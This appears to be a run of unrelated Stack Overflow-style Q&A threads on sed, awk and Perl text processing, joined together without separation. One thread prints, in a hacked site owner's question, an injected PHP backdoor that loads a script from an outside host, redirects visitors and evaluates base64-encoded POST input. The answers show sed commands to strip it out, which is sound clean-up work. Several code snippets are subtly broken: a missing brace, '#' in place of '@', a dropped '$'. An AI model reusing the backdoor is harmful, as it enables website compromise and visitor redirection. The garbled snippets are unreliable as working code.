I have a sed script that replaces all occurrences of a string in a file with another string.
I want to do it in place, but without passing -i on the command line.
What changes need to be made to the .sed file?
#!/bin/sed
s/include/\#include/
Just use awk:
{ sub(/include/,"#include"); rec = rec $0 RS }
END{ printf "%s", rec > FILENAME }
or if you want to operate strictly on strings:
BEGIN{ old="include"; new="#include" }
s = index($0,old) { $0 = substr($0,1,s-1) new substr($0,s+length(old)) }
{ rec = rec $0 RS }
END{ printf "%s", rec > FILENAME }
which can be simplified to:
s = index($0,"include") {$0 = substr($0,1,s-1) "#" substr($0,s)
{ rec = rec $0 RS }
END{ printf "%s", rec > FILENAME }
in this particular case of just prepending # to a string.
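Both awk variants rewrite the file without -i by buffering every line in rec and overwriting the input from the END block (the printf ... > FILENAME redirection only opens the file for writing once all input has been read). Saved as, say, replace.awk (a hypothetical name), it would run as:
awk -f replace.awk file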
I don't think it will work, because the -i and -f options can usually both have arguments, but you could be lucky.
The shebang line can contain one option group (aka cluster). You would need it to contain -f (which is missing from your example), so the cluster could look like
#!/bin/sed -if
provided that your dialect doesn't require an argument to the -i option, and permits clustering like this in the first place (-if for -i -f).
The obvious workaround is to change the script to a shell script; the -f option is no longer required because the script is not in a file.
#!/bin/sh
exec sed -i 's/include/#include/' "$@"
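Saved as, say, subst-include (a hypothetical name) and made executable, the wrapper can be applied to any number of files (this is GNU sed syntax; BSD sed would need -i ''):
$ chmod +x subst-include
$ ./subst-include file1.c file2.c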
I would like to replace a key's value, or append the key if it is missing, in a configuration file like sshd_config:
Key1 value
#Key2 value
The idea of the command is:
$ cmd Key1 home file
$ cmd Key2 house file
$ cmd Key3 flat file
So the resulting file is:
Key1 home
Key2 house
Key3 flat
Any help is more than welcome.
I have taken this as an example, but the version that comments and uncomments lines is not working properly.
I have also managed with other approaches, but only for commented or uncommented lines separately, and I want everything in one command if possible.
sed '/^Key\s/{h;s/\(\s\).*/\1newvalue/};${x;/^$/{s//Key newvalue/;H};x}' file
This one works if the Key exists, but how do I append it if it doesn't?
sed -i 's/^#\(Key\s\).*/\1newvalue/g' file
Thanks a lot. I have tried to understand sed, but the different spaces (pattern and hold) are quite complex, and I don't know how to match the key both with and without the leading #.
Edit: the same logic as an in-place edit using GNU awk's -i inplace (gawk 4.1+), with stdout discarded:
$ sudo tee -a /usr/local/bin/conf-space-replace-or-append > /dev/null << 'EOL'
#!/bin/bash
awk -i inplace -v key="$1" -v val="$2" '
($1 == key) || ($1 == "#"key) { $0 = key OFS val; done=1 }
{ print }
END { if (!done) print key, val }
' "$3" > /dev/null
EOL
$ sudo chmod +x /usr/local/bin/conf-space-replace-or-append
$ sudo conf-space-replace-or-append Port 22 /etc/ssh/sshd_config
sed is for doing s/old/new on an individual line, that is all. For anything else you should be using awk for clarity, simplicity, portability, efficiency, etc., etc.
Just put the following in a file named cmd and execute it as you show in your question.
awk -v key="$1" -v val="$2" '
($1 == key) || ($1 == "#"key) { next }
{ print }
END { print key, val }
' "$3"
The above deletes the existing key+val if present and always appends the new pair to the end of the file. If you'd rather keep an existing key in its original position in the file and only add new key+val pairs to the end, then that's just a tweak:
awk -v key="$1" -v val="$2" '
($1 == key) || ($1 == "#"key) { $0 = key OFS val; done=1 }
{ print }
END { if (!done) print key, val }
' "$3"
I have a "pipe-separated" file that has about 20 columns. I want to just hash the first column which is a number like account number using sha1sum and return the rest of the columns as is.
Whats the best way I can do this using awk or sed?
Accountid|Time|Category|.....
8238438|20140101021301|sub1|...
3432323|20140101041903|sub2|...
9342342|20140101050303|sub1|...
Above is an example of the text file showing just 3 columns. Only the first column has the hash function applied to it. The result should look like:
Accountid|Time|Category|.....
104a1f34b26ae47a67273fe06456be1fe97f75ba|20140101021301|sub1|...
c84270c403adcd8aba9484807a9f1c2164d7f57b|20140101041903|sub2|...
4fa518d8b005e4f9a085d48a4b5f2c558c8402eb|20140101050303|sub1|...
What the Best Way™ is, is up for debate. One way to do it with awk is
awk -F'|' 'BEGIN { OFS=FS } NR == 1 { print } NR != 1 { gsub(/'\''/, "'\'\\\\\'\''", $1); command = ("echo '\''" $1 "'\'' | sha1sum -b | cut -d\\ -f 1"); command | getline hash; close(command); $1 = hash; print }' filename
That is
BEGIN {
OFS = FS # set output field separator to field separator; we will use
# it because we meddle with the fields.
}
NR == 1 { # first line: just print headers.
print
}
NR != 1 { # from there on do the hash/replace
# this constructs a shell command (and runs it) that echoes the field
# (singly-quoted to prevent surprises) through sha1sum -b, cuts out the hash
# and gets it back into awk with getline (into the variable hash)
# the gsub bit is to prevent the shell from barfing if there's an apostrophe
# in one of the fields.
gsub(/'/, "'\\''", $1);
command = ("echo '" $1 "' | sha1sum -b | cut -d\\ -f 1")
command | getline hash
close(command)
# then replace the field and print the result.
$1 = hash
print
}
You will notice the differences between the shell command at the top and the awk code at the bottom; that is all due to shell expansion. Because I put the awk code in single quotes in the shell commands (double quotes are not up for debate in that context, what with $1 and all), and because the code contains single quotes, making it work inline leads to a nightmare of backslashes. Because of this, my advice is to put the awk code into a file, say foo.awk, and run
awk -F'|' -f foo.awk filename
instead.
Here's an awk executable script that does what you want:
#!/usr/bin/awk -f
BEGIN { FS=OFS="|" }
FNR != 1 { $1 = encodeData( $1 ) }
47
function encodeData( fld ) {
cmd = sprintf( "echo %s | sha1sum", fld )
cmd | getline output
close( cmd )
split( output, arr, " " )
return arr[1]
}
Here's the flow break down:
Set the input and output field separators to |
When the row isn't the first (header) row, re-assign $1 to an encoded value
Print the entire row when 47 is true (always)
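The bare 47 works because any non-zero pattern is true in awk, and a pattern with no action defaults to printing the record (1 is the more common idiom):
$ seq 3 | awk '47'
1
2
3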
Here's the encodeData function break down:
Create a cmd to feed data to sha1sum
Feed it to getline
Close the cmd
On my system, there's extra info after the hash in the sha1sum output, so I discard it by splitting the output
Return the first field of the sha1sum output.
With your data, I get the following:
Accountid|Time|Category|.....
104a1f34b26ae47a67273fe06456be1fe97f75ba|20140101021301|sub1|...
c84270c403adcd8aba9484807a9f1c2164d7f57b|20140101041903|sub2|...
4fa518d8b005e4f9a085d48a4b5f2c558c8402eb|20140101050303|sub1|...
Run it by calling awk.script data (or ./awk.script data once it's executable).
EDIT by EdMorton:
sorry for the edit, but your script above is the right approach; it just needs some tweaks to make it more robust, and this is much easier than trying to describe them in a comment:
$ cat tst.awk
BEGIN { FS=OFS="|" }
NR==1 { for (i=1; i<=NF; i++) f[$i] = i; next }
{ $(f["Accountid"]) = encodeData($(f["Accountid"])); print }
function encodeData( fld, cmd, output ) {
cmd = "echo \047" fld "\047 | sha1sum"
if ( (cmd | getline output) > 0 ) {
sub(/ .*/,"",output)
}
else {
print "failed to hash " fld | "cat>&2"
output = fld
}
close( cmd )
return output
}
$ awk -f tst.awk file
104a1f34b26ae47a67273fe06456be1fe97f75ba|20140101021301|sub1|...
c84270c403adcd8aba9484807a9f1c2164d7f57b|20140101041903|sub2|...
4fa518d8b005e4f9a085d48a4b5f2c558c8402eb|20140101050303|sub1|...
The f[] array decouples your script from hard-coding the number of the field that needs to be hashed. The additional arguments in the function declaration make cmd and output local to the function, so they are always null/zero on each invocation. The if on getline means you won't return the previous success value if it fails (see http://awk.info/?tip/getline). The rest is maybe more style/preference, with a bit of a performance improvement.
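The f[] header-lookup idiom is worth remembering on its own; a minimal sketch with made-up data:
$ printf 'Accountid|Time\n8238438|20140101021301\n' |
    awk -F'|' 'NR==1 { for (i=1; i<=NF; i++) f[$i]=i; next } { print $(f["Time"]) }'
20140101021301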
I'm having a problem dealing with some files. I need to count the columns in every line of a file and, depending on the number of columns, append several ','s to the end of each line. All lines should have 36 columns separated by ','.
This line solves my problem, but how do I run it over a folder with several files in an automated way?
awk ' BEGIN { FS = "," } ;
{if (NF == 32) { print $0",,,," } else if (NF==31) { print $0",,,,," }
}' <SOURCE_FILE> > <DESTINATION_FILE>
Thank you for all your support
R&P
The answer depends on your OS, which you haven't told us. On UNIX and assuming you want to modify each original file, it'd be:
for file in *
do
awk '...' "$file" > tmp$$ && mv tmp$$ "$file"
done
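For example, plugging the awk from the question into the loop (path hypothetical; a pass-through print is added so lines that already have 36 fields survive unchanged):
for file in /path/to/files/*
do
    awk 'BEGIN { FS = "," }
         NF == 32 { print $0 ",,,,"; next }
         NF == 31 { print $0 ",,,,,"; next }
         { print }' "$file" > "tmp$$" && mv "tmp$$" "$file"
done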
Also, in general to get all records in a file to have the same number of fields you can do this without needing to specify what that number of fields is (though you can if appropriate):
$ cat tst.awk
BEGIN { FS=OFS=","; ARGV[ARGC++] = ARGV[ARGC-1] }
NR==FNR { nf = (NF > nf ? NF : nf); next }
{
tail = sprintf("%*s",nf-NF,"")
gsub(/ /,OFS,tail)
print $0 tail
}
$
$ cat file
a,b,c
a,b
a,b,c,d,e
$
$ awk -f tst.awk file
a,b,c,,
a,b,,,
a,b,c,d,e
$
$ awk -v nf=10 -f tst.awk file
a,b,c,,,,,,,
a,b,,,,,,,,
a,b,c,d,e,,,,,
It's a short one-liner with Perl:
perl -i.bak -F, -alpe '$_ .= "," x (36-@F)' *
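A quick check on one line, without -i so nothing is modified (using 6 instead of 36 to keep the output short):
$ printf 'a,b,c\n' | perl -F, -alpe '$_ .= "," x (6-@F)'
a,b,c,,,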
if this is only a single folder without subfolders, use:
for oldfile in /path/to/files/*
do
newfile="${oldfile}.new"
awk '...' "${oldfile}" > "${newfile}"
done
if you also want to include subdirectories recursively, it's probably easiest to put the awk+redirection into a small shell-script, like this:
#!/bin/bash
oldfile=$1
newfile="${oldfile}.new"
awk '...' "${oldfile}" > "${newfile}"
and then run this script (let's call it runawk.sh) via find:
find /path/to/files/ -type f -not -name "*.new" -exec runawk.sh \{\} \;
I have a problem where I need to call a Perl script, with parameters passed in, and get its return value in an AWK BEGIN block, like below.
I have a Perl script util.pl
#!/usr/bin/perl -w
$exe_cmd = join(" ", @ARGV);  # assumption: the arguments form the command to run
$res = `$exe_cmd`;
print $res;
Now in the AWK BEGIN block (ksh) I need to call the script and get the return value.
BEGIN { print "in awk, application type is " type;
} \
{call per script here;}
How do I call the Perl script with parameters and get the value of $res back? Something like:
res = util.pl a b c;
Pipe the script's output into getline:
awk 'BEGIN {
cmd = "util.pl a b c";
cmd | getline res;
close(cmd);
print "in awk, application type is " res
}'
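If the arguments live in awk variables rather than literals, build the command string by concatenation (variable names here are hypothetical; beware shell metacharacters in the values):
awk -v a=foo -v b=bar 'BEGIN {
    cmd = "util.pl " a " " b
    cmd | getline res
    close(cmd)
    print "in awk, application type is " res
}'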
Part of an AWK-script I use for extracting data from a ldap query. Perhaps you can find some inspiration from how I do the base64 decoding below...
/^dn:/{
if($0 ~ /^dn: /){
split($0, a, "[:=,]")
name=a[3]
}
else if($0 ~ /^dn::/){
# Special handling needed since ldap apparently
# uses base64 encoded strings for *some* users
cmd = "/usr/bin/base64 -i -d <<< " $2 " 2>/dev/null"
while ( ( cmd | getline result ) > 0 ) { }
close(cmd)
split(result, a, "[:=,]")
name=a[2]
}
}
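One caveat: awk runs command pipelines through /bin/sh, and <<< (a here-string) is a bash/ksh/zsh feature, so this fails where sh is not one of those shells. Piping the value in with printf is more portable (a sketch, assuming the field contains no single quotes):
cmd = "printf '%s' '" $2 "' | /usr/bin/base64 -d 2>/dev/null"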
I got hacked by running a really outdated Drupal installation (shame on me)
It seems they injected the following in every .php file:
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
}
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
Can I remove and replace this with sed? e.g.:
find . -name '*.php' | xargs ...
I hope to get the site working just for the time being, so I can use wget and make a static copy.
You can use sed with something like
sed '1 s/^.*$/<?php/'
The 1 address makes the command apply to the first line only. The s command then replaces the whole line with <?php.
To modify your files in-place, use the -i option of GNU sed.
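Combined with the find from the question, and assuming GNU sed for -i, that could look like:
find . -name '*.php' -exec sed -i '1s/^.*$/<?php/' {} +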
To replace the first line of a file, you can use the c (for "change") command of sed:
sed '1c<?php'
which translates to: "on line 1, replace the pattern space with <?php".
For this particular problem, however, something like this would probably work:
sed '1,/^$/c<?php'
which reads: change the range "line 1 to the first empty line" to <?php, thus replacing all injected code.
(The second part of the address (the regular expression /^$/) should be replaced with an expression that would actually delimit the injected code, if it is not an empty line.)
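A quick demonstration of the range form (GNU sed syntax), assuming the injected block ends at the first empty line:
$ printf '<?php $evil=1;\n\nreal_code();\n' | sed '1,/^$/c<?php'
<?php
real_code();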
# replace only first line
printf 'a\na\na\n' | sed '1 s/a/b/'
printf 'a\na\na\n' | perl -pe '$. <= 1 && s/a/b/'
result:
b
a
a
perl is needed for more complex regexes, for example lookarounds (lookahead, lookbehind).
sample use: patch shebang lines in script files to use /usr/bin/env.
the shebang line is the first line of a script: #!/bin/bash etc.
find . -type f -exec perl -p -i -e \
'$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' '{}' \;
this will replace #! /usr/bin/python3 with #!/usr/bin/env python3
to make the script more portable (NixOS, ...)
the (?!env) negative lookahead prevents double-replacing
it's not perfect, since #!/bin/env foo is not replaced with #!/usr/bin/env foo ...
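a quick way to verify the substitution on a throwaway file (name hypothetical):
$ printf '#! /usr/bin/python3\nprint("hi")\n' > demo.py
$ perl -p -i -e '$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' demo.py
$ head -1 demo.py
#!/usr/bin/env python3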